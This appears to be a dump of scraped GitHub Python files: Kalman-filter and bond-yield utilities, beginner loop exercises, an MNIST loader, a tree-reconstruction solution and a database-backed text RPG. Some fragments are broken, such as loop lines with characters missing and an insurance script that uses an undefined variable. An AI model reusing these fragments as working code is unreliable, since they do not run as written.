t].reshape(N, 1)\n\n K_adj = (P_next[:, :, t] @ beta1_D.T) @ invomega\n X_now[:, t] = X_next[:, t] + (K_adj @ a).flatten()\n P_now[:, :, t] = P_next[:, :, t] - K_adj @ beta1_D @ P_next[:, :, t]\n\n X_next[:, t+1] = kappa_D @ X_now[:, t]\n P_next[:, :, t+1] = kappa_D @ P_now[:, :, t] @ kappa_D.T + Q\n\n\n #-------------------------------------------------\n # Backward step\n #-------------------------------------------------\n\n X_tT = np.zeros((N, T))\n P_tT = np.zeros((N, N, T))\n X_tT[:, -1] = X_now[:, -1]\n P_tT[:, :, -1] = P_now[:, :, -1]\n\n for t in range(T-2):\n J = P_now[:, :, -2-t] @ kappa_D.T @ P_next[:, :, -2-t]\n X_tT[:, -2-t] = X_now[:, -2-t] + J @ (X_now[:, -1-t] - X_next[:, -2-t])\n P_tT[:, :, -2-t] = P_now[:, :, -2-t] + J @ (P_now[:, :, -1-t] - P_next[:, :, -2-t]) @ J.T\n\n return X_tT, P_tT\n\n\n\ndef xi_restrictions(x_vec, case = 0):\n\n if case == 0:\n params = x_vec\n elif case == 1:\n params = np.asarray([x_vec[0], 0.0, 0.0, 0.0, 0.0, 0.0])\n elif case == 2:\n params = np.asarray([0.0, 0.0, 0.0, x_vec[0], 0.0, x_vec[1]])\n elif case == 3:\n params = np.asarray([x_vec[0], 0.0, 0.0, x_vec[1], 0.0, x_vec[2]])\n elif case == 4:\n params = np.asarray([0.0, 0.0, 0.0, x_vec[0], x_vec[1], x_vec[2]])\n elif case == 5:\n params = np.asarray([x_vec[0], 0.0, 0.0, x_vec[1], x_vec[2], x_vec[3]])\n elif case == 6:\n params = np.asarray([x_vec[0], x_vec[1], x_vec[2], x_vec[3], -x_vec[1]*x_vec[2]/x_vec[3], x_vec[4]])\n\n return params\n\ndef make_Xi(params):\n '''\n Parameterize the positive semidefinite symmetric matrix by its square root\n almost Cholesky...diagonal elements should be strictly positive\n '''\n xi_sq = np.asarray([[params[0], 0, 0],\n [params[1], params[3], 0],\n [params[2], params[4], params[5]]])\n return xi_sq @ xi_sq.T\n\n\ndef extract_xi(param_xi):\n Xi = np.asarray([[ param_xi[0], 0.0, 0.0],\n [2*param_xi[1], param_xi[3], 0.0],\n [2*param_xi[2], param_xi[4], param_xi[5]]])\n\n Xi_sym = (.5)*(Xi + Xi.T)\n xi_0 = param_xi[0]\n xi_1 = np.asarray([[param_xi[1]], [param_xi[2]]])\n xi_2 = np.asarray([ [param_xi[3], 0.0], [param_xi[4], param_xi[5]] ])\n\n return xi_0, xi_1, xi_2, Xi_sym\n\ndef extract_params(param, N=2, M=2, K=2, model = 'unrestricted'):\n \"\"\"\n (1) Unrestricted model: (length of param = N+N*N+N*K+M*N+M+M*K = 20)\n param = phi, kappa, sigma, beta0, beta1, alpha\n The first M elements are for phi, the next NxN elements are for kappa, the next NxK elements are sigma\n The next M are for beta0, the next MxN are for beta1, the remaining MxK are for alpha\n\n (2) Restricted 1 model: (length of param = N*N + N*K + M + M*K = 14)\n param = kappa, sigma, beta0, lt(alpha)\n\n (3) Restricted 2 model: (length of param = N*N + N*K + M + (M*K-1) = 13)\n param = kappa, sigma, beta0, lt(alpha)\n\n (4) Restricted 3 model: (length of param = N*N + (N*K-1) + (M*K-1) = 10)\n param = kappa, sigma, lt(alpha)\n \"\"\"\n\n if model == 'unrestricted' and len(param) == N+N*N+N*K+M*N+M+M*K:\n phi = param[:N].reshape(N, 1)\n kappa = param[N:N+N*N].reshape(N, N)\n sigma = param[N+N*N:N+N*N+N*K].reshape(N, K)\n\n beta0 = param[N+N*N+N*K:N+N*N+N*K+M].reshape(M, 1)\n beta1 = param[N+N*N+N*K+M:N+N*N+N*K+M*N+M].reshape(M, N)\n alpha = param[N+N*N+N*K+M*N+M:N+N*N+N*K+M*N+M+M*K].reshape(M, K)\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model == 'restricted_1' and len(param) == N*N+N*K+M+M*K:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n beta0 = param[N*N+N*K:N*N+N*K+M].reshape(M, 1)\n beta1 = np.eye(M)\n alpha = param[N*N+N*K+M:N*N+N*K+M+M*K].reshape(M, K)\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model == 'restricted_2' and len(param) == N*N+N*K+M+M*K-1:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n# resolv = np.eye(N) - kappa\n# kappa_C = -la.logm(kappa)\n# kappa_inv = la.inv(kappa_C)\n# beta1 = kappa_inv @ resolv\n\n beta0 = param[N*N+N*K:N*N+N*K+M].reshape(M, 1)\n beta1 = np.eye(M)\n aa = param[N*N+N*K+M:N*N+N*K+M+M*K-1]\n alpha = np.asarray([[aa[0], 0.0],[aa[1], aa[2]]])\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n elif model =='restricted_3' and len(param) == N*N+N*K+M*K-1:\n phi = np.zeros((N, 1))\n kappa = param[:N*N].reshape(N, N)\n sigma = param[N*N:N*N+N*K].reshape(N, K)\n\n beta0 = np.zeros((M, 1))\n beta1 = np.eye(M)\n aa = param[N*N+N*K:N*N+N*K+M*K-1]\n alpha = np.asarray([[aa[0], 0.0],[aa[1], aa[2]]])\n\n return phi, kappa, sigma, beta0, beta1, alpha\n\n else:\n raise ValueError(\"The specification is not consistent with the length of param!\")\n\n\ndef build_params(phi, kappa, sigma, beta0, beta1, alpha):\n \"\"\"\n The inverse of extract_params\n \"\"\"\n N, K = sigma.shape\n M = phi.shape[0]\n\n params = np.hstack([np.reshape(phi, (N,) ),\n np.reshape(kappa, (N*N,) ),\n np.reshape(sigma, (N*K,) ),\n np.reshape(beta0, (M,) ) ,\n np.reshape(beta1, (M*N,) ),\n np.reshape(alpha, (M*K,) )])\n\n return params\n\n\ndef from_discrete_to_cont(phi_D, kappa_D, sigma_D, beta0_D, beta1_D, alpha_D):\n\n tau = 1\n N, K = sigma_D.shape\n M = beta1_D.shape[0]\n\n kappa = -la.logm(kappa_D) / tau\n if type(kappa[0,0])== np.complex128:\n raise ValueError(\"kappa is complex\")\n\n kappa_inv = la.inv(kappa)\n\n vecSigma = (sigma_D @ sigma_D.T).flatten('F')\n KK = np.kron(kappa, np.eye(N)) + np.kron(np.eye(N), kappa)\n sigma2 = np.reshape( la.inv( np.eye(N * N) - la.expm(-KK * tau) ) @ KK @ vecSigma, (N, N))\n\n try:\n sigma = np.linalg.cholesky(sigma2)\n except np.linalg.LinAlgError:\n raise ValueError(\"Sigma2 is not positive definite\")\n\n resolv = np.eye(N) - kappa_D\n mu = resolv @ phi_D\n phi = kappa @ mu\n\n beta1 = beta1_D @ la.inv(resolv) @ kappa\n beta0 = beta0_D/tau - (beta1 @ (np.eye(N) - kappa_inv @ resolv ) @ mu)\n\n #def finding_alpha(param):\n # alpha = np.asarray([[param[0], 0], [param[1], param[2]]])\n # vecSigma = (sigma @ sigma.T).flatten('F')\n\n # const = beta1 @ kappa_inv @ sigma + alpha\n # integ = kappa_inv @ resolv\n # integ_transpose = (np.eye(N) - la.expm(-kappa.T*tau)) @ kappa_inv.T\n # Q_c = kappa_inv @ sigma @ sigma.T @ kappa_inv.T\n # vecQ = Q_c.flatten('F')\n\n # first_term = (const @ const.T)*tau\n # second_term = - const @ ( sigma.T @ kappa_inv.T @ integ_transpose @ beta1.T )\n # third_term = - ( beta1 @ integ @ kappa_inv @ sigma ) @ const.T\n # fourth_term = beta1 @ np.reshape( la.inv( KK ) @ (np.eye(N*N) - la.expm(-KK*tau)) @ vecQ ,(N,N)) @ beta1.T\n\n # alpha2_alter = first_term + second_term + third_term + fourth_term\n\n # return (alpha_D - np.linalg.cholesky(alpha2_alter)).flatten()[[0,2,3]]\n\n #try:\n # sol = sp.optimize.root(finding_alpha, (alpha_D - np.eye(N)/1000).flatten()[[0, 2, 3]] )\n # alpha_p = sol.x\n # alpha = np.asarray([[alpha_p[0], 0], [alpha_p[1], alpha_p[2]]])\n #except TypeError:\n # raise ValueError(\"Problem with the solver\")\n\n# return phi, kappa, sigma_D, beta0, beta1, alpha_D\n return phi, kappa, sigma, beta0, beta1, alpha_D\n\n\ndef NBER_Shade(ax, start_date, date_file):\n \"\"\"\n This function adds NBER recession bands to a Matplotlib Figure object.\n ax : axis\n start_date : start date for the sample, form: yyyy-mm-dd\n \"\"\"\n\n # load the NBER recession dates\n NBER_Dates = pd.read_csv(date_file)\n sample_1 = pd.Timestamp(start_date) <= pd.DatetimeIndex(NBER_Dates['Peak'])\n sample_2 = pd.Timestamp(start_date) <= pd.DatetimeIndex(NBER_Dates['Trough'])\n NBER_Dates = NBER_Dates[sample_1 + sample_2]\n\n # for loop generates recession bands!\n for i in NBER_Dates.index:\n ax.axvspan(NBER_Dates['Peak'][i], NBER_Dates['Trough'][i],\n facecolor='grey', alpha=0.15)\n\n\ndef quadratic(x1, x2, xi0, xi1, xi2):\n val = xi0 + 2*(xi1[0]*x1 + xi1[1]*x2) + (x1**2)*xi2[0] + (x2**2)*xi2[2] + (x1*x2)*xi2[1]\n val[val < 0] = np.nan\n\n return val\n\n\ndef autocorr_gradient(estimates):\n Ex2, Ey2, Exxj, Exyj, Eyxj, Eyyj = estimates\n\n sig_x = np.sqrt(Ex2)\n sig_y = np.sqrt(Ey2)\n der_x = -(.5)/(sig_x**3 * sig_y)\n der_y = -(.5)/(sig_x * sig_y**3)\n\n ACF = np.asarray([Exxj/Ex2,\n Exyj/(sig_x * sig_y),\n Eyxj/(sig_x * sig_y),\n Eyyj/Ey2])\n\n G = np.asarray([[-Exxj/(Ex2**2), 0, 1/Ex2, 0, 0, 0],\n [ Exyj * der_x, Exyj * der_y, 0, 1/(sig_x*sig_y), 0, 0],\n [ Eyxj * der_x, Eyxj * der_y, 0, 0, 1/(sig_x*sig_y), 0],\n [ 0, -Eyyj/(Ey2**2), 0, 0, 0, 1/Ey2]])\n return ACF, G\n\n\n\ndef NW_se(data, k):\n \"\"\"\n This function computes GMM standard errors for the mean and standard deviation estimators\n \"\"\"\n\n data = np.atleast_2d(data)\n data = data[np.isfinite(data)]\n T = max(data.shape)\n data = data.reshape(T, 1)\n\n gmm_mean = np.nanmean(data)\n gmm_stdev = np.nanstd(data)\n\n d_hat = np.asarray([[-1, 0], [0, -2*gmm_stdev]])\n\n f1 = data - np.ones((T, 1))*gmm_mean\n f2 = (data - np.ones((T, 1))*gmm_mean)**2 - np.ones((T, 1))*gmm_mean**2\n f = np.hstack([f1, f2])\n\n R = (f.T @ f)/T\n\n for i in range(1, k):\n R_temp = (f[i:, :].T @ f[:-i, :])/T\n R += 2 * (1 - i/k) * R_temp\n\n S = R\n\n V = np.linalg.inv(d_hat.T @ np.linalg.inv(S) @ d_hat)\n\n return np.asarray([gmm_mean, gmm_stdev]), np.sqrt(np.diag(V)/T)\n\ndef NW_corr(data, k):\n \"\"\"\n This function computes GMM standard errors for the mean and standard deviation estimators\n \"\"\"\n\n data = np.atleast_2d(data)\n T = max(data.shape)\n data = data.reshape(T, 2)\n data = data - data.mean(0)\n\n Ex2 = np.mean(data[:, 0]**2)\n Ey2 = np.mean(data[:, 1]**2)\n Exy = np.mean(data[:, 0] * data[:, 1])\n\n f1 = (data[:, 0]**2 - Ex2).reshape(T, 1)\n f2 = (data[:, 1]**2 - Ey2).reshape(T, 1)\n f3 = (data[:, 0] * data[:, 1] - Exy).reshape(T, 1)\n\n f = np.hstack([f1, f2, f3])\n R = (f.T @ f)/T\n\n for i in range(1, k):\n R_temp = (f[i:, :].T @ f[:-i, :])/T\n R += 2 * (1 - i/k) * R_temp\n\n V = R\n\n d_hat = np.asarray([[-0.5*Exy/Ex2**(3/2)/np.sqrt(Ey2), -0.5*Exy/np.sqrt(Ex2)/Ey2**(3/2), 1/np.sqrt(Ex2)/np.sqrt(Ey2)]])\n\n\n return Exy/np.sqrt(Ex2)/np.sqrt(Ey2), np.sqrt(d_hat @ V @ d_hat.T/T)[0]\n\n\ndef autocorrelation(data, nn, NW_lags):\n T, M = data.shape\n data = np.asarray(data - data.mean(0))\n\n store_est = np.zeros((nn + 1, 3*M))\n store_acorr = np.zeros((nn + 1, M*M))\n store_se = np.zeros((nn + 1, M*M))\n\n\n for j in range(nn + 1):\n numb_obs = T - j\n store_uu = np.zeros((3*M, numb_obs))\n\n u_Ex2 = data.T[0, j:]**2\n u_Ey2 = data.T[1, j:]**2\n store_est[j, 0] = u_Ex2.mean()\n store_est[j, 1] = u_Ey2.mean()\n\n store_uu[0, :] = u_Ex2 - store_est[j, 0]\n store_uu[1, :] = u_Ey2 - store_est[j, 1]\n\n for m in range(M):\n for k in range(M):\n xt_ytj = data[j:, m] * data[:T-j, k]\n acov_gmm = xt_ytj.mean()\n u = (xt_ytj - acov_gmm).reshape(T-j, 1)\n store_uu[2 + 2*m + k, :] = u.T\n store_est[j, 2 + 2*m + k] = acov_gmm\n\n R = (store_uu @ store_uu.T)/numb_obs\n\n for i in range(1, NW_lags):\n R_temp = (store_uu[:, i:] @ store_uu[:, :-i].T)/numb_obs\n R += 2 * (1 - i/NW_lags) * R_temp\n\n store_acorr[j, :], G = autocorr_gradient(store_est[j, :])\n store_se[j, :] = np.sqrt(abs(np.diag((G @ R @ G.T))/numb_obs))\n\n LB = store_acorr - 2*store_se\n UB = store_acorr + 2*store_se\n\n return store_acorr, LB, UB\n\ndef autocorr_model(kappa, sigma, model2, isnn):\n\n N, M, K = 2, 2, 2\n\n b = model2.zero_coupon_yields(tau=4, worstcase=1)[1:].reshape(2, 1)\n db = model2.zero_coupon_yields(tau=20, worstcase=1)[1:].reshape(2, 1) - model2.zero_coupon_yields(tau=4, worstcase=1)[1:].reshape(2, 1)\n\n beta1 = np.vstack([b.T, db.T]) @ kappa\n sigma = sigma*100\n alpha = np.vstack([b.T, db.T]) @ sigma\n\n cov_array = np.zeros((nn + 1, M, M))\n Exx, G, L = cont.dare(kappa.T, np.zeros((N, N)), sigma @ sigma.T, np.eye(N))\n cov_array[0, :, :] = beta1 @ Exx @ beta1.T + alpha @ alpha.T\n\n for j in range(1, nn + 1):\n cov_array[j, :, :] = beta1 @ np.linalg.matrix_power(kappa, j-1) @ (kappa @ Exx @ beta1.T + sigma @ alpha.T)\n\n acorr_model = np.zeros((nn + 1, 2, 2))\n\n acov_model = cov_array\n sig_x, sig_y = np.sqrt(acov_model[0, 0, 0]), np.sqrt(acov_model[0, 1, 1])\n sigmas = np.asarray([[sig_x*sig_x, sig_x*sig_y],\n [sig_y*sig_x, sig_y*sig_y]])\n\n for i in range(nn + 1):\n acorr_model[i, :, :] = acov_model[i, :, :]/sigmas\n\n return acorr_model\n\n\ndef FB_bootstrap(yy, xx):\n \"\"\"\n This function implements the so called \"bootstrapping\" method to turn par yields\n into zero coupon yields.\n\n Arguments:\n yy : list of par yields with different maturities (in quarters)\n ascending order for a given date t\n xx : list of corresponding maturities (in quarters!)\n\n NOTE: We need this bacause the survey questions refer to\n Treasury par (CMT) yields. But the affine term structure model is affine only in\n zero-coupon yields (not par yields). They are actually quite close, so hopefully\n the approximation error is small.\n \"\"\"\n yy = np.asarray(yy)\n\n #---------------------------------\n # Take care of the NaNs\n #---------------------------------\n if np.isnan(yy)[-1]==True:\n yy[-1] = yy[-2] #+ (yy[-2] - yy[-3])\n nan = np.isnan(yy)\n nonan = np.array([not e for e in nan])\n\n #---------------------------------\n # \"Bootstrapping\" Fama and Bliss\n #---------------------------------\n\n par = interp1d(xx[nonan], yy[nonan])\n z_rate = 1 + yy/200\n zeroc = np.asarray(par(2))\n\n for ytm in np.arange(2, 61)*2:\n ind = int(ytm/2)\n cc = (par(ytm)/2) * np.ones(ind)\n cc[-1] += 100\n new_zero = ((cc[-1]/(100 - sum((1 + zeroc/200)**(-np.arange(1, ind)) * cc[:-1])))**(1/ind) - 1)*200\n zeroc = np.hstack([zeroc, new_zero])\n\n return zeroc\n\n\ndef nan_interpolator(y):\n \"\"\"Helper to handle indices and logical indices of NaNs.\n\n Input:\n - y, 1d numpy array with possible NaNs\n Output:\n - nans, logical indices of NaNs\n - index, a function, with signature indices= index(logical_indices),\n to convert logical indices of NaNs to 'equivalent' indices\n \"\"\"\n y = np.asarray(y)\n\n nans, x = np.isnan(y), lambda z: z.nonzero()[0]\n y[nans]= np.interp(x(nans), x(~nans), y[~nans])\n\n return y\n","repo_name":"szokeb87/estimating_robustness","sub_path":"code/robust_utils.py","file_name":"robust_utils.py","file_ext":"py","file_size_in_byte":20787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1020433440","text":"x =0\r\n\"\"\"\r\nwhile x <100:\r\n if(x%2==0):\r\n print(f\"sayi cift: {x}\")\r\n else:\r\n print(f\"sayi tek: {x}\")\r\n x =x+1\r\nprint(\"done...\")t\r\n\"\"\"\r\nname =\"\" #false\r\nwhile not name:\r\n name=input(\"enter your name\")\r\nprint(f\"Merhaba, {name}\")\r\nsayilar =[1,3,5,7,9,12,19,11]\r\ni=0\r\nwhile (i0:\r\n print(k)\r\n k-=5\r\nnmuberss =[]\r\nsay =0\r\nwhile say<5:\r\n nsay=int(input(\"sayi \"))\r\n nmuberss.append(nsay)\r\n say +=1\r\nprint(nmuberss)\r\n\"\"\"\r\nproducts =[]\r\ncount = int (input (\"how many have you wanna add\"))\r\nl=0\r\nwhile(l 0:\n test_data = prepare_data_masks(data, test_ind, print_params = print_params)\n else:\n test_data = torch.empty()\n print(df)\n return train_data, test_data, df\n\n\n\n\nif __name__ == \"__main__\":\n\n config = configs.ConfigBase()\n df = dataloading.load_navco(G_range=[5.0, 0.0], Q_thresh=2.0, Q_log=False, T_rank=0)\n train_data, test_data, df = prepare_df(df, print_params = True)\n print(df)\n print(train_data)\n\n\n","repo_name":"niklasstoehr/ordinal-conflict-intensity","sub_path":"g1data/g1data/dataprepping.py","file_name":"dataprepping.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40585964878","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Google.\n\n# Given pre-order and in-order traversals of a binary tree, write a function to reconstruct the tree.\n\n# For example, given the following preorder traversal:\n\n# [a, b, d, e, c, f, g]\n\n# And the following inorder traversal:\n\n# [d, b, e, a, f, c, g]\n\n# You should return the following tree:\n\n# a\n# / \\\n# b c\n# / \\ / \\\n# d e f g\n\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef build_tree(preorder, inorder):\n if not preorder or not inorder:\n return None\n\n root_val = preorder[0]\n root = TreeNode(root_val)\n root_index = inorder.index(root_val) \n\n left_subtree_inorder = inorder[:root_index] \n right_subtree_inorder = inorder[root_index + 1:] \n\n left_subtree_preorder = preorder[1:1 + len(left_subtree_inorder)]\n right_subtree_preorder = preorder[1 + len(left_subtree_inorder):]\n\n root.left = build_tree(left_subtree_preorder, left_subtree_inorder)\n root.right = build_tree(right_subtree_preorder, right_subtree_inorder)\n\n return root\n\ndef reconstruct_tree(preorder, inorder):\n return build_tree(preorder, inorder)\n\n\ndef print_tree(root):\n if root is None:\n return\n \n print(root.val)\n print_tree(root.left)\n print_tree(root.right)\n \n\n\n# test\npreorder = ['a', 'b', 'd', 'e', 'c', 'f', 'g']\ninorder = ['d', 'b', 'e', 'a', 'f', 'c', 'g']\n\ntree = reconstruct_tree(preorder, inorder)\n\nprint_tree(tree)\n","repo_name":"mouli-dutta/Daily-Coding-Problems","sub_path":"DailyCodingProblem48.py","file_name":"DailyCodingProblem48.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30829533849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 14:45:13 2019\r\n\r\n@author: Shrutika\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndt=pd.read_csv(r'C:\\Users\\Shrutika\\Desktop\\spyder programs\\EDA-Datasets\\Insurance.csv')\r\nd.columns\r\nd.shape\r\nd.head()\r\nd.tail()\r\nd['Y']=d['Y'].str.replace('','')","repo_name":"Pratiksakpal16/ml-algorthms","sub_path":"insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71590923621","text":"import os\nimport re\n\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef load_data(image_dir, one_hot_encoder=None):\n \"\"\"Load the MNIST-digit images and labels from a given path.\"\"\"\n\n image_names = os.listdir(image_dir)\n N = len(image_names)\n\n # List of images.\n X = np.empty((N, 28, 28, 1))\n # List of labels.\n y = np.empty((N, 1), dtype=str)\n\n \"\"\"\n Regex to extract the label from the filename.\n\n Filenames are of the form UniqueId_Label.png where UniqueId is just a unique number identifying an image\n and Label is the digit that is represented in the image.\n \"\"\"\n label_regex = re.compile(r\"\\d+_(\\d)\")\n\n for i, image_name in enumerate(image_names):\n # Load the image.\n image_path = os.path.join(image_dir, image_name)\n image = Image.open(image_path)\n # Get the label.\n label = label_regex.match(image_name)[1]\n\n # Convert from image file to array.\n image_array = np.asarray(image)\n image_array = image_array.astype('float32')\n # Normalize all values to [0; 1)\n image_array = image_array / 255\n\n # Add sample to the list.\n X[i, ...] = np.expand_dims(image_array, axis=-1)\n y[i, 0] = label\n\n \"\"\"\n The encoder performs what is called \"one-hot encoding\".\n\n It's a standard way to represent categorical data in Machine Learning. If our data can be one of N classes\n then we will represent the n-th label as a vector of length N with all 0 values except for the n-th which will be 1.\n This is done because the model can only predict numerical values and labels are not (strictly) numerical.\n\n Example\n If the classes are [\"cat\", \"dog\", \"table\"] then N = 3\n \"cat\" => [1, 0, 0]\n \"dog\" => [0, 1, 0]\n \"table\" => [0, 0, 1]\n\n You can read more about it here:\n https://machinelearningmastery.com/one-hot-encoding-for-categorical-data/\n https://machinelearningmastery.com/why-one-hot-encode-data-in-machine-learning/\n \"\"\"\n if one_hot_encoder is None:\n one_hot_encoder = OneHotEncoder()\n one_hot_encoder.fit(y)\n\n y = one_hot_encoder.transform(y)\n\n # The encoder obect must be returned as it will be used to decode the predictions at the end.\n return X, y, one_hot_encoder\n\n\ndef load_dataset(data_dir):\n \"\"\"Load both training and testing data.\"\"\"\n\n train_dir = os.path.join(data_dir, \"training\")\n test_dir = os.path.join(data_dir, \"testing\")\n\n X_train, y_train, one_hot_encoder = load_data(train_dir)\n X_test, y_test, _ = load_data(test_dir, one_hot_encoder)\n\n return (X_train, y_train), (X_test, y_test), one_hot_encoder\n","repo_name":"imanlab/iml_dl_tutorial","sub_path":"examples/mnist-digits-cnn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"1591603860","text":"from database import DatabaseConnection\nfrom player import Player\nfrom commands import CommandInterpreter\n\n\nclass Game(CommandInterpreter):\n player = None\n enemies = []\n\n def __init__(self):\n super(CommandInterpreter, self).__init__()\n self.db_connection = DatabaseConnection()\n pass\n\n def start(self):\n print('Jogo Iniciou')\n self.execute_menu()\n\n def start_new_game(self):\n print('Novo Jogo!')\n\n player_info = self.create_character()\n self.display_player_info(player_info)\n\n def create_character(self):\n name = input('Digite o nome do seu personagem: ')\n id_race = self.choose_race()\n id_class = self.choose_class()\n id_map = '5'\n player_id = self.db_connection.create_player(\n name,\n id_race,\n id_class,\n id_map\n )\n\n inventory = self.get_initial_gear(player_id)\n player_info = self.db_connection.get_player_basic_info(player_id)\n\n self.player = Player(\n player_id=(player_id,),\n inventory=inventory,\n player_basic_info=player_info\n )\n\n\n print('AVENTUREIRO CRIADO COM SUCESSO!')\n print(f\"ID DO AVENTUREIRO {player_id}\")\n return player_info\n\n def get_initial_gear(self, player_id):\n # TODO change this accordingly with the player class\n # return {\n # 'weapons': [\n # self.db_connection.add_item_to_inventory(\n # player_id,\n # self.db_connection.get_weapon,\n # 'Espada'\n # ),\n # self.db_connection.add_item_to_inventory(\n # player_id,\n # self.db_connection.get_weapon,\n # 'Escudo'\n # )\n # ],\n # 'potions': [],\n # 'armour': [],\n # 'boost': [],\n # }\n return {}\n\n @staticmethod\n def display_player_info(player_list):\n player_info = player_list[0]\n name = player_info[0]\n race_data = player_info[1].replace('(', '').replace(')', '').split(',')\n race_name = race_data[1]\n class_data = player_info[2].replace('(', '').replace(')', '').split(\n ',')\n class_name = class_data[1]\n location = player_info[3]\n print('!! AVENTUREIRO -----------------------------------------------')\n print(f'Nome: {name}')\n print(f'Raça: {race_name}')\n print(f'Classe: {class_name}')\n print(f'Local Atual: {location}')\n stats = {\n 0: 'DESTREZA',\n 1: 'CARISMA',\n 2: 'INTELIGENCIA',\n 3: 'FORÇA',\n 4: 'SABEDORIA',\n 5: 'CONSTITUIÇÃO'\n }\n for index, value in enumerate(zip(race_data[2:8], class_data[2:8])):\n print(\n f'{stats.get(index)}: '\n f'{str(sum([int(item) for item in value]))}'\n )\n print('--------------------------------------------------------------')\n\n def choose_class(self):\n classes = self.db_connection.get_classes()\n print('\\nClasses:')\n for char_class in classes:\n print(f'{char_class[1]} => '\n f'DESTREZA: {char_class[2]}, '\n f'CARISMA {char_class[3]}, '\n f'INTELIGÊNCIA {char_class[4]}, '\n f'FORÇA {char_class[5]}, '\n f'SABEDORIA {char_class[6]}, '\n f'CONSTITUIÇÃO: {char_class[7]}'\n f'\\n---------------------------')\n print('Digite o nome da Classe! Exemplo: Assassino')\n return input('Escolha a classe do seu personagem: ')\n\n def choose_race(self):\n races = self.db_connection.get_races()\n print('\\nRAÇAS:')\n for race in races:\n print(f'{race[1]} => '\n f'DESTREZA: {race[2]}, '\n f'CARISMA {race[3]}, '\n f'INTELIGÊNCIA {race[4]}, '\n f'FORÇA {race[5]}, '\n f'SABEDORIA {race[6]}, '\n f'CONSTITUIÇÃO: {race[7]}'\n f'\\n---------------------------')\n print('Digite o nome da raça! Exemplo: Orc')\n return input('Escolha a raça do seu personagem: ')\n\n def load_game(self):\n print('Carregar Jogo!')\n\n player_id = input('Digite o id do seu personagem: ')\n inventory = self.db_connection.get_inventory(player_id)\n\n player_info = self.db_connection.get_player_basic_info(player_id)\n\n self.player = Player(\n player_id=player_id,\n inventory=inventory,\n player_basic_info=player_info\n )\n\n self.display_player_info(player_info)\n\n def exit(self):\n pass\n\n def execute_menu(self):\n menu = {\n '1': {\n 'str': 'Iniciar novo jogo',\n 'func': self.start_new_game\n },\n '2': {\n 'str': 'Carregar jogo',\n 'func': self.load_game},\n '0': {\n 'str': 'Sair',\n 'func': self.exit\n }\n }\n for item in menu:\n print(f'{item}) {menu.get(item).get(\"str\")}')\n player_choice = input('Escolha uma opção: ')\n\n if player_choice:\n menu.get(str(player_choice)).get('func')()\n if self.player:\n self.run_gameplay()\n else:\n exit()\n\n def run_gameplay(self):\n while True:\n if self.player.dead:\n break\n self.display_basic_info()\n self.display_player_location()\n\n command = input('>>> ')\n try:\n status = self.parse_command(command)\n except Exception as error:\n print(f'Erro {error}')\n pass\n\n if self.player.dead:\n print(\"Game Over!\")\n\n def display_basic_info(self):\n print('-----------------AVENTUREIRO-----------------')\n print(f\"\\tID: {self.player.player_id}\")\n print(f\"\\tNome: {self.player.name}\")\n print(f\"\\tVida: {self.player.life}\")\n print('---------------------------------------------\\n')\n\n def display_player_location(self):\n result = self.db_connection.get_player_location(self.player.player_id)\n print(f'Local: {result.get(\"name\")}')\n print(f'{result.get(\"description\")}')\n self.display_enemies()\n if not self.player.in_combat:\n self.display_exits(result)\n\n def display_enemies(self):\n if not self.enemies:\n self.player.in_combat = False\n return\n\n self.player.in_combat = True\n print('\\nHá inimigos aqui! Você está em combate!')\n for enemy in self.enemies:\n print(f'Id ({enemy.get(\"id\")}) '\n f'INIMIGO: {enemy.get(\"name\")}, '\n f'Vida: {enemy.get(\"life\")}\\n')\n\n @staticmethod\n def display_exits(result):\n north_string = (\n f'{result.get(\"north\").get(\"name\")}, '\n f'id: {result.get(\"north\").get(\"id\")}'\n ) if result.get(\"north\").get(\"id\") else \"Nada!\"\n south_string = (\n f'{result.get(\"south\").get(\"name\")}, '\n f'id: {result.get(\"south\").get(\"id\")}'\n ) if result.get(\"south\").get(\"id\") else \"Nada!\"\n east_string = (\n f'{result.get(\"east\").get(\"name\")}, '\n f'id: {result.get(\"east\").get(\"id\")}'\n ) if result.get(\"east\").get(\"id\") else \"Nada!\"\n west_string = (\n f'{result.get(\"west\").get(\"name\")}, '\n f'id: {result.get(\"west\").get(\"id\")}'\n ) if result.get(\"west\").get(\"id\") else \"Nada!\"\n print(\n f'Saídas:'\n f'\\n\\tAo norte: {north_string}'\n f'\\n\\tAo sul: {south_string}'\n f'\\n\\tAo ao leste: {east_string}'\n f'\\n\\tAo oeste: {west_string}'\n )\n\n print(\n '''\\n\\tPara se mover digite o comando \"ir {id do lugar}, por exemplo.\"\n Para mais informações, utilize o comando \"ajuda ir\",\n Ou apenas \"ajuda\" para obter informações gerais sobre os comandos. \n '''\n )\n\n\nif __name__ == '__main__':\n game = Game()\n game.start()\n","repo_name":"SBD1/Grupo5-Dungeons-and-Dragons","sub_path":"app/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"35706939630","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 27 